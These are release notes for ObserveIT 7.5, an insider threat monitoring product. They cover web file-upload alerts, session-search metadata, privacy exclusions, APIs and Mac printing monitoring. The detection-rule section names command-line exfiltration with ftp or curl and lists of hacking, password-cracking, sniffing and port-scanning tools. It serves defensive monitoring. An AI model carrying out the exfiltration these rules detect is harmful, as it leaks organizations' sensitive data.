ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 1
WHAT’S NEW IN OBSERVEIT 7.5
ObserveIT 7.5 release is an important milestone to ObserveIT’s Insider Threat Management solution.
The exciting new features and functionality will help your security teams to identify, investigate, and
eliminate insider threats. This latest release advances our modern approach to insider threat detection
and prevention for the post-DLP world, bringing user activity and data activity together with analytics.
ObserveIT can now protect organizations against one of the most popular ways for users to exfiltrate
data – uploading files to the web.
Whether the file was originally downloaded from a company website/portal and tracked by ObserveIT, or
whether it is just a file stored on a local disk or shared network drive – ObserveIT 7.5 can now detect
and alert when the file is being uploaded to the web – covering a huge spectrum of data exfiltration
scenarios, such as emailing sensitive files to personal web mails, uploading to cloud storage websites,
social media, collaboration sites and more.
Adding the new file upload capabilities to the existing capabilities of monitoring and tracking files that
were downloaded via a browser, plus monitoring attempts to move such files to a cloud storage sync
folder – ObserveIT 7.5 now provides an end-to-end solution for monitoring file activity over the web, as
presented in the following diagram:
ObserveIT 7.5 helps Security Analysts and Investigators to identify and resolve incidents faster by
exposing File Activity Meta-data (FAM) in more modules across the Management Console, specifically in
Search and Video Player.
ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 2
ObserveIT 7.5 keeps improving the scalability of the product by dramatically cutting down archive
processing time. Reducing the size of meta-data sent from agents to the backend servers helps to better
utilize existing infrastructure (lower TCO) and increase performance.
ObserveIT 7.5 integrates better with security tools and processes by adopting an API-first approach.
Additionally, it introduces modern and faster APIs to retrieve recorded meta-data and aggregated User
Activity Profile (UAP) data to be used by SIEM and analytic products. All APIs are available from a new
Developer Portal.
ObserveIT 7.5 keeps improving the Mac agent as the demand for monitoring users on Mac is growing.
Printing activity is now monitored on Mac, and user activity on Mac can be easily detected using new
icons in the Management Console.
ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 3
OBSERVEIT 7.5 KEY NEW FEATURES
Monitor any file being uploaded to web – detect and stop data exfiltration
✓ Monitor and alert on any file being uploaded to any website.
✓ Alert by specific websites or web categories (e.g. Web Mail).
✓ For tracked files (originally downloaded from web) – a full history of the uploaded file is available.
FAM & enriched context across the Management Console – faster investigation
✓ Search now includes FAM data as searching options and in the results list.
✓ Activity list in Video Player shows application context and FAM data.
Exclude website categories from being recorded –protect employee privacy
✓ Control which specific web categories to record, exclude, or record as meta-data only.
Integration and Enterprise Readiness – address IT and security needs raised by customers
✓ Significantly cut down the time it takes to archive screenshot data stored on the file system.
✓ New Report & Analytics APIs (SIEM and UAP) and new Authentication API.
✓ Manage endpoints by their machine IP address (in addition to endpoint name).
Insider Threat Library (ITL) – out of the box rules to detect insider threats
✓ 66 new rules added, detecting more threats on all supported platforms.
✓ Enriched content of OOB lists with more suspicious tools to detect, also on Mac
Mac Agent – more data exfiltration scenarios and easier investigation
✓ Monitor printing activity on Mac
✓ Mac icon and OS type is used across the Management Console
ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 4
DATA EXFILTRATION: MONITOR FILE UPLOADS TO THE WEB
A common way to take data out is by uploading files to external websites. Whether sending a file with
sensitive data to your personal webmail (e.g. Gmail), attaching it to a Facebook or LinkedIn message,
uploading the file to your Google Drive, or sending it to your personal email address via WeTransfer –
there are millions of easy ways for someone to exfiltrate data by simply using a web browser and internet
connection.
Organizations can block access to some of the known channels, however, this might impact everyday
business as some of the websites are legitimately used from time to time. In addition, there are too many
websites to manage and new sites are introduced quite often.
ObserveIT 7.5 monitors any attempt to upload a file to any website.
Now you can:
➢ Alert when a tracked file is sent out as a webmail attachment (e.g. Gmail).
➢ Alert when any sensitive file is uploaded to social media sites, file sharing, cloud storage or any other
website.
➢ Educate and deter users by displaying just-in-time warnings or blocking messages when a suspicious
upload activity is detected.
➢ Track the full history of the uploaded tracked file – back to the original download site (if the file was
originally downloaded from web).
➢ Easily search uploaded files by their name, location, target website, uploading user, and more.
➢ For tracked files you can also search by the original file name and original website. For example, you
can search for the following activity using the File Diary:
“Show all file uploads by John, but only those files that were originally downloaded from
Salesforce as Excel files”.
Even if the user renamed the file before the upload, ObserveIT will still know that this file is originally
an Excel file that was downloaded from Salesforce.
ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 5
Monitoring files uploaded to any website
Alerts on file uploads are very flexible. You can define alerts based on:
➢ File name, e.g. any file name containing “strategy”
➢ File type, e.g. file names ending with “.xls” or “.xlsx”
➢ Target web site or web category, e.g. “facebook.com” or “Social Media Site”
➢ File location, e.g. “\\fileshare\finance\payments\2018”
➢ For tracked files, you can alert also based on the original file name and the website it was
downloaded from.
ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 6
Example: Alert on any downloaded MS-OFFICE file being uploaded to any webmail, social, IM, or cloud storage
website – except for box.com (which is used for in-house file collaboration)
ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 7
SEARCH: INCLUDES FILE ACTIVITY METADATA (FAM)
Security analysts can now search for any user or data activity including file downloads & uploads, copy to
cloud, and more.
FAM data is integrated into the Search module allowing you to:
➢ View search results for file activity together with all other user activity
➢ Find specific data activity (e.g. file download, upload) from the Search window. No need to go to the
File Diary for that.
For example, searching for “roadmap.pptx”, will return any user or data activity related to the file name:
➢ Any download of “roadmap.pptx”
➢ Any upload of “roadmap.pptx”
➢ Any copy/move of “roadmap.pptx”
➢ Copy of “roadmap.pptx” to one of the supported Cloud vendor’s sync folders
➢ Printing of “roadmap.pptx”
➢ Renaming or deleting the file (in case of a tracked file)
➢ Viewing the file, e.g. Window title contains “roadmap.pptx”
➢ Using “roadmap.pptx” as part of a URL address
➢ Using “roadmap.pptx” as part of a command line
ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 8
New search options help you to quickly focus on both User and Data Activity
VIDEO PLAYER: RICHER CONTEXT IN USER ACTIVITY LIST
During session playback, it is important to see the full context of what happened through the session.
ObserveIT 7.5 helps Security Analysts and Investigators to respond faster by providing richer context in
the user activity list:
➢ Application / Website
Every activity now shows the application (or website for web activity) in which the activity
occurred
➢ FAM data
FAM data activity, such as file download, upload, copy to cloud, etc. - is now displayed together
with all other user activities and in the right chronological order.
Monitoring files uploaded to any website
ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 9
ARCHIVE: SIGNIFICANTLY REDUCE PROCESSING TIME
As the size of ObserveIT deployments grow, the time it takes to archive or delete the recorded
screenshots grows as well. ObserveIT 7.5 redesigned the way screenshot data is stored on the file
system to significantly reduce archive processing time – especially in large size deployments.
ObserveIT 7.5 can Archive or Delete up to 6 times faster compared to earlier releases, allowing
customers to complete the processing time within the allocated nightly batch window.
This improvement is relevant for video recording with screenshots stored in the file system.
The performance improvement is achieved by packing completed sessions into a single file – resulting in
a much faster copy/delete action compared to copying/deleting many image files, which is much slower.
To enable the new capability, you need to select the appropriate storage mode as shown below.
Configuring Screen Storage Optimization for best performance
ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 10
PRIVACY: EXCLUDE WEBSITE CATEGORIES FROM BEING RECORDED
Protecting employee privacy is an important goal for our customers – and therefore for us.
It is sometimes required not to record certain types of websites that are considered personal and are
often not related to work (e.g. Social Media, Financial Products).
ObserveIT 7.5 allows you to exclude such websites from being recorded by simply identifying the web
category you wish to exclude. Using our website categorization capabilities, ObserveIT can match any
URL visited by the user to the right category.
You can also decide to only record meta-data (i.e. no video) for the selected categories, so you can still
have meta-data for detection and investigation – and turn on video only upon alert.
If needed, you can also decide to record only certain web categories.
Excluding personal website categories from being fully recorded
ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 11
INTEGRATIONS: DEVELOPER PORTAL
ObserveIT is deeply integrated within the security fabric of organizations, with native integrations into top
software and systems.
With ObserveIT 7.5, we’re launching a revamped developer portal that enables our customers and
partners to easily build or extend integrations with top SIEM, security automation and orchestration, and
ticketing solutions. Besides the out of the box native apps for Splunk, IBM QRadar, LogRhythm, and
others, developers can use the RESTful APIs to access comprehensive metadata around users and their
data activity with real-time alerts.
ObserveIT Developer Portal
ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 12
The new Developer Portal supports the following RESTful APIs:
API Description
Report API User activity and alerts exported to SIEM, analytics, orchestration,
and other tools.
Note: Exporting data to SIEM works about 20 times faster in
ObserveIT 7.5.
Report Analytics API (UAP) Aggregated activity time spent by the user in applications, websites,
endpoints, etc.
Authentication API OAUTH2 based API
Control API List management API
ITL: NEW AND ENHANCED OUT-OF-THE-BOX RULES
ObserveIT’s Insider Threat Library (ITL) is a set of hundreds of out-of-the-box rules that detect 30
categories of insider threats. Base on feedback from our customers and from market researchers (e.g.
CERT), we keep improving the ITL to better identify and eliminate insider threats.
ObserveIT 7.5 introduces additional 66 new rules, totaling to over 300 ITL rules.
New ITL alerts include:
➢ Exfiltrating ANY file by uploading to web (not just tracked)
➢ Exfiltrating data via command line (ftp, curl, etc.)
➢ Mac specific: Sensitive logins, machine takeover, creating backdoors, etc.
➢ Disabled users (ex-employees) logging in
➢ Messing with ObserveIT libraries/processes
➢ Suspicious activity in Docker & Container environments (Unix/Linux)
➢ Performing suspicious activity in Git
Many of the rules are based on lists (e.g. Sniffing Tools) for easier management and reuse.
ObserveIT keeps updating the lists to catch up with market changes and to align them with newly
supported agent platforms.
ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 13
New and enhanced ITL lists include:
➢ Disabled users (ex-employees)
➢ Port scanning
➢ Hacking & password cracking tools
➢ VPN tools
➢ Steganography
➢ Enterprise web applications
➢ Cloud backup tools
➢ P2P tools
➢ Remote login utilities
➢ SQL tools
➢ Command line tools
➢ Unauthorized commands
MANAGE ENDPOINTS BY MACHINE IP
Some IT organizations prefer to manage their endpoints by their machine IP address versus by the
machine name.
In the previous release (7.4) we added support for IP ranges (CIDR), while in ObserveIT 7.5 we simplify
agent management and the investigation process by adding the option to display endpoint IP addresses
across the Management Console (Diaries, Search, Reports, Alerts, etc.) – in addition to the endpoint
name.
Showing endpoint IP address in the Endpoint Diary
ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 14
As one endpoint can have multiple IP addresses, the displayed IP address is the one used by the agent to
connect to the Application Server. This new capability is relevant when the IP address is fixed and not
dynamic.
MAC AGENT ENHANCEMENTS
ObserveIT 7.5 introduces a better Mac agent that can detect data exfiltration done via Printing. In
addition, the visibility of Mac endpoints and user activity in the Management Console is enhanced.
MONITORING PRINTING ACTIVITY
Printing is still a common way for users to take data out. ObserveIT 7.5 introduces new capability to
monitor printing activity on Mac, allowing customers to search and report on any printing activity, and to
define alerts on suspicious printing activity.
The meta-data collected on printing includes:
➢ Printer name
➢ Document name
➢ Number of pages sent to the printer
MAC PRESENCE IN THE MANAGEMENT CONSOLE
To make the management of Mac endpoints easier, and to make investigation faster, ObserveIT 7.5
displays a Mac icon near recorded Mac sessions, Mac endpoints, Mac endpoint groups, etc.
Mac OS type is available in various filters to quickly focus on Mac-specific activity.
ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 15
Mac endpoints and user activity easily spotted with new Mac icon
ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 16
NEW PLATFORMS
ObserveIT 7.5 supports recently introduced platforms to allow maximum coverage across the
organization.
Product Component New Platforms
Windows agent DBA Activity support for Microsoft SSMS 17.1, 17.2, 17.3
Citrix agent XenDesktop and XenApp 7.15
Linux agent Oracle Linux 6.9
Debian 9
Amazon Linux 2017.09
Database Server Microsoft SQL Server 2017
* Stop supporting Microsoft SQL Server 2008